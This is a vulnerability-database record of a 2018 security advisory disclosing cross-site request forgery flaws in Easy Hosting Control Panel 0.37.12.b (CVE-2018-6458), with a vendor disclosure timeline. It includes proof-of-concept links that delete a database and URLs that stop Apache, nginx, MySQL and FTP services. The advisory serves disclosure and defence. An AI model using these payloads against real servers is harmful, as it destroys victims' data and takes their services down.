{"id": "PACKETSTORM:147555", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Easy Hosting Control Panel 0.37.12.b Cross Site Request Forgery", "description": "", "published": "2018-05-09T00:00:00", "modified": "2018-05-09T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/147555/Easy-Hosting-Control-Panel-0.37.12.b-Cross-Site-Request-Forgery.html", "reporter": "hyp3rlinx", "references": [], "cvelist": ["CVE-2018-6458"], "lastseen": "2018-05-10T01:08:32", "viewCount": 14, "enchantments": {"score": {"value": 5.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-6458"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2018-6458"]}]}, "exploitation": null, "vulnersScore": 5.5}, "sourceHref": "https://packetstormsecurity.com/files/download/147555/EHCP-v0.37.12.b-MULTIPLE-CSRF.txt", "sourceData": "`[+] Credits: hyp3rlinx \n[+] Website: hyp3rlinx.altervista.org \n[+] Source: http://hyp3rlinx.altervista.org/advisories/EHCP-v0.37.12.b-MULTIPLE-CSRF.txt \n[+] ISR: Apparition Security \n \n \n***Greetz: indoushka|Eduardo|Dirty0tis*** \n \nVendor: \n======== \nwww.ehcp.net \n \n \nProduct: \n========= \nEasy Hosting Control Panel \nv0.37.12.b \n \n \nEhcp is a Hosting Control Panel. \nEhcp is a tool in a server to facilate the process of hosting domains, emails, adding domains, ftp users and so on. \n \n \nVulnerability Type: \n=================== \nCross Site Request Forgery(s) \n \n \nCVE Reference: \n============== \nCVE-2018-6458 \n \n \nSecurity Issue: \n================ \nEHCP lacks cross site request forgery security tokens to protect against unauthorized requests from remote attackers. To exploit these cross-site request-forgery issues, \nan attacker must lure an unsuspecting authenticated victim into following a malicious URI or link. \n \nNo CSRF protection so clicking on a link we can delete Database(s): \n<a href='http://127.0.0.1/ehcp/index.php?op=domainop&action=deletedb&id=7&confirm=1'>Drop my database please</a> \n \ndeleting db 7 : myDB \nConnected as user : root \nDropped database: myDB \n \nSuccess delete db from ehcp db user bozo : deleted from ehcp db \nuser bozo : deleted user from mysql \nuser bozo : deleted user from mysql.db \nuser bozo : deleted user from mysql.tables_priv \nuser bozo : deleted user from mysql.columns_priv \n \n \nCSRF Denial of Service(s): \n \nKill Apache \n<a href='http://127.0.0.1/ehcp/index.php?op=dostopapache2'>Kill my Apache please</a> \n \nOR \n \nStop / start services: \nhttp://127.0.0.1/ehcp/index.php?op=dostopapache2 \nhttp://127.0.0.1/ehcp/index.php?op=dostopnginx \nhttp://127.0.0.1/ehcp/index.php?op=dostopmysqld \nhttp://127.0.0.1/ehcp/index.php?op=dostopvsftpd \n \n \n \nNetwork Access: \n=============== \nRemote \n \n \n \nSeverity: \n========= \nMedium \n \n \n \nDisclosure Timeline: \n============================= \nVendor Notification: January 26, 2018 \nVendor Acknowledges issues: January 27, 2018 \nMitre Assigns CVE : January 29, 2018 \nInformed vendor of CVE : January 31, 2018 \nVendor \"Will be fixed soon, I think.\" : Febuary 2, 2018 \nRequest update : Febuary 8, 2018 \nVendor : \"no progress yet. Will inform you any progress.\" : Febuary 10, 2018 \nInform vendor of 90 day disclose policy : Febuary 10, 2018 \nRequest update : February 21, 2018 \nVendor \"Not Yet.\" : Febuary 22, 2018 \nRequest update : March 3, 2018 \nVendor \"I plan to start check/fixes with Ubuntu 18.04.\" : March 3, 2018 \nRequest ETA : March 4, 2018 \nVendor \"Will start working when Ubuntu 18.04 released\" : March 4, 2018 \nRequest update : March 25, 2018 \nVendor \"password storage already fixed, others waiting for next release.\" : March 26, 2018 \nRequest update : April 13, 2018 \nVendor \"same situation\" : April 15, 2018 \nRemind vendor of 90 day disclose policy : April 16, 2018 \nNo reply \nRequest update : April 22, 2018 \nNo reply \nRemind vendor again : April 27, 2018 \nNo reply \nMay 9, 2018 : Public Disclosure \n \n \n \n[+] Disclaimer \nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise. \nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and \nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit \nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility \nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information \nor exploits by the author or elsewhere. All content (c). \n \nhyp3rlinx \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645249213}}